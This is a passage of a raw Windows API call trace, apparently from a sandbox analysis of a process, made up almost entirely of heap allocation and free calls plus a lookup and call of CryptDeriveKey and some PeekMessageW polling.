lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0074.772] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0074.772] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0074.772] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0074.772] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e180 [0074.772] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0074.772] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0074.772] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0074.772] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e108 [0074.772] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0074.773] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0074.773] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0d8 [0074.773] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0074.773] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0c0 [0074.773] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0074.773] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0074.773] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0074.773] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0074.773] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0074.773] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0074.773] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0074.773] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0074.773] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0074.773] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0074.773] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e060 [0074.773] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0074.773] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0074.773] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0074.773] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0074.773] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e090 [0074.773] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0074.773] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0074.773] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0074.773] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0074.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0074.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0074.774] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0074.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0074.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0074.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0074.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0074.774] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0074.774] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0074.774] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0074.774] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0074.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df68 [0074.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0074.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0074.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0074.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0074.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0074.774] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0074.774] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0074.774] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0074.774] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0074.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0074.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0074.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0074.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0074.775] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0074.775] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0074.775] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0074.775] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0074.775] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0074.775] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0074.775] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0074.775] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0074.775] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0074.775] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0074.775] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0074.775] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0074.775] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0074.775] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0074.775] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0074.775] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0074.775] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0074.775] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0074.775] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0074.775] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0074.775] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0074.775] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0074.775] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0074.775] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0074.775] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0074.776] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0074.776] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb488 [0074.776] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0074.776] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0074.776] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0074.776] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0074.776] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0074.776] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0074.776] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb488 [0074.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0074.776] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xf) returned 0x76e3d8 [0074.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x76e3d8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0074.776] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0074.776] GetProcAddress (hModule=0x77710000, lpProcName="CryptDeriveKey") returned 0x77753188 [0074.776] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0074.776] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0074.776] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd60 [0074.776] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb488 [0074.776] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0074.776] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb518 [0074.777] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0074.777] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0074.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0074.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0074.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0074.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0074.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0074.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd60 | out: hHeap=0x650000) returned 1 [0074.777] CryptDeriveKey (in: hProv=0x696ad0, Algid=0x660e, hBaseData=0x6b8b38, dwFlags=0x1, phKey=0x61e2c0 | out: phKey=0x61e2c0*=0x6b8b78) returned 1 [0074.779] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0074.779] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x6a0ca8 [0074.780] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0074.780] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0074.780] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0074.780] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0074.780] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0074.780] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0074.780] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0074.780] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0074.780] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0074.780] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0074.780] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e168 [0074.780] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0074.780] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0074.780] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0074.780] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0074.780] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0074.780] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e168 [0074.780] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0074.780] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0074.780] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0074.780] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0074.780] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0074.780] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e168 [0074.780] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0074.781] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0074.781] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0074.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0074.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0074.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0074.781] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0074.781] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0074.781] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0074.781] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0074.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0074.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0074.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0074.781] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0074.781] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0074.781] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0074.781] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0074.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0074.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0074.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0074.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0074.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0074.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0074.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0074.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0074.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0074.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0074.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0074.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0074.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0074.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0074.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0074.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0074.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0074.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0074.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0074.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0074.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0074.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0074.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0074.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0d8 | out: hHeap=0x650000) returned 1 [0074.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0074.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0074.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0074.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0074.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e090 | out: hHeap=0x650000) returned 1 [0074.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0074.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0074.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0074.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0074.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0074.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0074.783] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0074.783] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0074.783] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b4b0 | out: hHeap=0x650000) returned 1 [0074.783] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0074.783] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0074.783] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0074.783] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0074.783] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0074.783] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a0ec8 | out: hHeap=0x650000) returned 1 [0074.783] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0074.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0074.783] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0074.783] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0074.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a0ec8 [0074.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0074.783] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a0ec8 | out: hHeap=0x650000) returned 1 [0074.783] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0074.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0074.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb538 [0074.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0074.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0074.783] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0074.783] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0074.783] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0074.783] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0074.783] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0074.784] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8bb8 [0074.784] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.784] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8bb8 | out: hHeap=0x650000) returned 1 [0074.784] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.784] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0074.784] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0074.784] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0074.784] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0074.784] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.784] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0074.784] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0074.784] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8af8 | out: hHeap=0x650000) returned 1 [0074.784] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.784] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0074.784] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0074.784] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0074.784] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0074.784] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0074.784] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0074.784] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df68 [0074.784] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e510 [0074.784] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e4f8 [0074.784] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e4c8 [0074.784] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0074.784] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e408 [0074.784] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e4b0 [0074.784] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e3c0 [0074.785] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 